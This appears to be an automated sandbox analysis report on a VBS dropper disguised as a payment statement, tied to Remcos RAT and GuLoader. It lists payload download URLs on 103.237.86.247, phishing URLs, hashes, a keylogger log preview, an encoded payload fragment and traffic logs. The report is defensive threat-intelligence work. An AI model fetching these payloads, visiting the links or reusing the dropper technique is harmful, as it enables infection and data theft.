• Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1084 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3528 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:12:57 | API Interceptor | 1x Sleep call for process: wscript.exe modified
01:12:59 | API Interceptor | 130x Sleep call for process: powershell.exe modified
01:14:13 | API Interceptor | 767384x Sleep call for process: wab.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
178.237.33.50 | Aviso de Pago __Banco Republica.pdf.bat.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | PAYMENT COPY 04.07.24.vbs | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | Payment- Statement Advise.vbs | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | DHL AWB 6533732999.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | BDQfYL99b2.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Quotation.xls | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Payment Advice__Swift-MT103.pdf.bat.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | UniCredit__Avviso di Pagamento.pdf.bat.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
103.237.86.247 | PAYMENT COPY 04.07.24.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/HsHtCq138.bin
103.237.86.247 | Payment- Statement Advise.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/rGcyeM139.bin
103.237.86.247 | SOA.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/pfoGTCLnx4.bin
103.237.86.247 | PAYMENT COPY.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/EkmwapeHusBKtnzhrLsgW0.bin
103.237.86.247 | STATEMENT OF ACCOUNT.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/xcjLjSb128.bin
103.237.86.247 | STATEMENT OF ACCOUNT.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/NtqoCaH77.bin
103.237.86.247 | SOA.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/mbLXhRfFSSN77.bin
103.237.86.247 | Payment Confirmation.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/nsQUkTChtPKgp70.bin
103.237.86.247 | SOA.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/qOreedem137.bin
103.237.86.247 | Statement Of Account (2).vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247/YckNurPLCcwPGiweiCyGTJ2.bin
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geoplugin.net | Aviso de Pago __Banco Republica.pdf.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | PAYMENT COPY 04.07.24.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | Payment- Statement Advise.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | DHL AWB 6533732999.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | BDQfYL99b2.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Quotation.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Payment Advice__Swift-MT103.pdf.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | UniCredit__Avviso di Pagamento.pdf.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
bg.microsoft.map.fastly.net | https://rb.gy/zsqpja | Get hash | malicious | HTMLPhisher | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | https://singingfiles.com/show.php?l=0&u=2156442&id=64574 | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | https://metamesklogni.webflow.io/ | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | https://rules-pear-kft5d2.mystrikingly.com/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | https://sula.starladeroff.com/ | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/ | Get hash | malicious | HTMLPhisher | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.html | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1 | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | http://dana-aktivasi-paylater.myindo.me/ | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | https://mail.support-xfinity.152-42-227-61.cprapid.com/Billing_Pay_Online.html?Review-VerificationMyAccount | Get hash | malicious | Unknown | Browse | 199.232.214.172
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
BGNR-AP2BainandCompanySG | PAYMENT COPY 04.07.24.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
BGNR-AP2BainandCompanySG | Payment- Statement Advise.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
BGNR-AP2BainandCompanySG | SOA.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
BGNR-AP2BainandCompanySG | PAYMENT COPY.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
BGNR-AP2BainandCompanySG | STATEMENT OF ACCOUNT.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.87.32
BGNR-AP2BainandCompanySG | STATEMENT OF ACCOUNT.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
BGNR-AP2BainandCompanySG | SOA.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.87.32
BGNR-AP2BainandCompanySG | Payment Confirmation.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
BGNR-AP2BainandCompanySG | SOA.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
BGNR-AP2BainandCompanySG | Statement Of Account (2).vbs | Get hash | malicious | Remcos, GuLoader | Browse | 103.237.86.247
ATOM86-ASATOM86NL | Aviso de Pago __Banco Republica.pdf.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | PAYMENT COPY 04.07.24.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Payment- Statement Advise.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1QP92XNATU.elf | Get hash | malicious | Unknown | Browse | 95.142.101.193
ATOM86-ASATOM86NL | PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | DHL AWB 6533732999.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | BDQfYL99b2.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Quotation.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Payment Advice__Swift-MT103.pdf.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
                No context
                No context
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.379519383183141
Encrypted: false
SSDEEP: 3:rhlKlVm29Zl5JWRal2Jl+7R0DAlBG45klovDl6v:6lVmO5YcIeeDAlOWAv
MD5: 1C625785BBAE0D28BC689D5DC6191540
SHA1: 5F9D2C1B9307E0F5CA23090C35E15AD56ABC9EDA
SHA-256: 2EE6EBAA94B4F6FB756316D2693CFB7EF15C591F57763484A41C7BF6B95A5029
SHA-512: 32B26D12CA01ED7C690CEF1FDC5F6A6FE1C01F2F654F4D6CFE18C928A7DE8778A9853AA2F304B169ED8E0748EEBBDF9D0B6E388CD87EA0567E6571D4B52AFEC5
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
Preview: ....[.2.0.2.4./.0.7./.0.5. .0.1.:.1.3.:.4.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Process: C:\Windows\System32\wscript.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 71954
Entropy (8bit): 7.996617769952133
Encrypted: true
SSDEEP: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5: 49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1: 1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256: B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512: BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Windows\System32\wscript.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.247897867253902
Encrypted: false
SSDEEP: 6:kK2i9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:udDImsLNkPlE99SNxAhUe/3
MD5: 6380C8D154A87E037FEF61401AD1CF0E
SHA1: 95CAE84155D7149FC9CF8D0399372C0769297F11
SHA-256: A53AA6D08C8FD6188C4FF3922F8BE4125FE9843881FD2A5C94491DD88BA33242
SHA-512: F119CB49619640F008273B45561D857125AD31E7D293BC313318B274B91EAA0C497D4CBFAE7E54AB921BAF9318EF7916617F8FF007A7A430A0876EBE910D4922
Malicious: false
Preview: p...... ................(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013130376969173
Encrypted: false
SSDEEP: 12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
MD5: F61E5CC20FBBA892FF93BFBFC9F41061
SHA1: 36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
SHA-256: 28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
SHA-512: 5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
Malicious: false
Preview: {. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.8908305915084105
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                Malicious:false
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:NlllulJnp/p:NllU
                MD5:BC6DB77EB243BF62DC31267706650173
                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                Malicious:false
                Preview:@...e.................................X..............@..........
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5c8a0e3c, page size 32768, DirtyShutdown, Windows version 10.0
                Category:dropped
                Size (bytes):17301504
                Entropy (8bit):0.8012478814233309
                Encrypted:false
                SSDEEP:6144:KdfjZb5aXEY2waXEY24URlMe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:IVS4e81ySaKKjLrONseWe
                MD5:16365526282C307D8A7ECF249E924571
                SHA1:71D42F0776D24C432CA2FF3B5675204C82DBB8CB
                SHA-256:8DB11711E8ABFEE844D8839D551FC1D08F2A20B9BDBEAFE650B474E5BB9DF075
                SHA-512:71912416EE7D56AD71E9A3D38DBE0118D13628CB304698A8460822CD91338505A7173093FCA9B1649C30C3CD5571378DA01CBC10033344D31EBABE4EE05FB340
                Malicious:false
                Preview:\..<... .......;!......E{ow("...{........................@..........{.......|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................z.......|..........................|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                Category:dropped
                Size (bytes):2
                Entropy (8bit):1.0
                Encrypted:false
                SSDEEP:3:Qn:Qn
                MD5:F3B25701FE362EC84616A93A45CE9998
                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                Malicious:false
                Preview:..
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):491856
                Entropy (8bit):5.87340617368492
                Encrypted:false
                SSDEEP:6144:ZGYZ6AtwmJdx8kzglzSpRooVAPqIQh7BlKaX8pKqhTiLZL8qoXmFJ6dtDfKINmY4:UjmPelzSpRooykySkTwZL8qoqJ0W2q
                MD5:6D536D802644EE3072E0E4BD701758A4
                SHA1:B802B7871E1DB6D28B03037F313312FA7C710D38
                SHA-256:F5DE199F85BC385767FF544322ACC7C0F35F72AF09A138F0D87BCFB48641B7A1
                SHA-512:CD080BCB2163EB01E17AA4AE88651754F2F2775192FA67F1850079BD8E5A47FD7FF73A31F55B2A56E234C06890F583F27473181E1F3B97DBA0053541350A408D
                Malicious:false
                Preview:cQGbcQGbuzTaGQDrArgBcQGbA1wkBOsCjt1xAZu5qNyt4OsC7PJxAZuB8cCWqmFxAZvrAkYvgfFoSgeB6wL/InEBm3EBm+sCvQG6N1iNTHEBm+sCi1dxAZvrAnn5McpxAZtxAZuJFAvrAj1N6wKnktHicQGb6wJn3YPBBOsCiA5xAZuB+YxIXgR8y+sCKcrrAl4+i0QkBOsCa5ZxAZuJw3EBm+sCRdOBwzHZHALrAuPI6wKtq7q7o4OgcQGb6wLtwYHyzhNlo3EBm3EBm4HCi08Z/OsCpPFxAZtxAZtxAZtxAZvrAk/YiwwQcQGbcQGbiQwTcQGb6wLR5ELrAldMcQGbgfo0KwUAddbrAl4O6wLYcIlcJAxxAZtxAZuB7QADAABxAZtxAZuLVCQIcQGb6wKpKIt8JARxAZtxAZuJ6+sC2AxxAZuBw5wAAABxAZvrAhczU3EBm+sCzmFqQOsCUs9xAZuJ63EBm+sCHpHHgwABAAAAMHsE6wLFeusCPi6BwwABAADrAqni6wKtxFPrAgsycQGbievrArh66wLKMIm7BAEAAHEBm+sCjT2BwwQBAABxAZtxAZtTcQGb6wKvsmr/cQGb6wLxCYPCBesC5BpxAZsx9nEBm3EBmzHJ6wKhvnEBm4sacQGb6wKSgkFxAZvrAl+tORwKdfNxAZvrAgzYRnEBm+sCg2CAfAr7uHXdcQGbcQGbi0QK/HEBm+sCXPcp8OsCh2DrApTB/9JxAZvrAipFujQrBQDrAjQwcQGbMcBxAZtxAZuLfCQMcQGbcQGbgTQHeFg3SOsC1i9xAZuDwARxAZtxAZs50HXlcQGbcQGbiftxAZvrAgu6/9dxAZvrAvFvQKUOkfG9tqTjrYFI+Zysus5YYsGd4S1mJXq2ufnWkdD5qaaAYOS2uWow1E4e3faPPFU3TxcnXS5BiA6A+Sw6SAObouP5LDpICGpiBfksOkh0xojEv91gSnhYDPgTwrbNL1o3SBOC8iD9
                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.491291237279013
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:PAYMENT - STATEMENT ADVISE.vbs
                File size:23'061 bytes
                MD5:8e3c190eff5e1e796f9cd8ac0eb18d0b
                SHA1:751c299c930a6975b1f311c3d645554d0cfe8654
                SHA256:a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204
                SHA512:a83264a4fce9bcfb6be07acf57e3122fb6b3d4e6efe43c014da59b49d8809d6a51c898077243c1c953fbf2b25453968972b5ca29c9eefa4dbebcb3384db83a06
                SSDEEP:384:w2+0bMHc3lcf0ghreYjfrPQ8dmc6qRloM9zKzUn/r:y0cc3yfdNTY8dnbEUnT
                TLSH:A1A22B1A1885DBDB7DEB2BFAC3092CE4DD3015E2453D02E82F8DA4E1790D6643D1A9D7
                File Content Preview:....Rapsoderreptatorystet203="Defaitistiske"..Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)......Whitedamp = Vitrifying40......Set Differentness = CreateObject("WScript.Shell")......Call Polyptote("cls;write 'Recovers Rowth Afhaengighed")
                Icon Hash:68d69b8f86ab9a86
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jul 5, 2024 07:13:00.153295040 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:00.158266068 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:00.158370972 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:00.158648014 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:00.164195061 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.116761923 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.116781950 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.116795063 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.116867065 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.116915941 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.116929054 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.116981030 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.367495060 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367538929 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367551088 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367619991 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367633104 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367640018 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.367679119 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.367748976 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367760897 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367772102 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.367799044 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.367820024 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.368371964 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.368520021 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.368530035 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.368580103 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.616668940 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.616704941 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.616715908 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.616763115 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.616813898 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.616826057 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.616872072 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.617042065 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.617089987 CEST | 49705 | 80 | 192.168.2.5 | 103.237.86.247
                Jul 5, 2024 07:13:01.617100954 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
                Jul 5, 2024 07:13:01.617113113 CEST | 80 | 49705 | 103.237.86.247 | 192.168.2.5
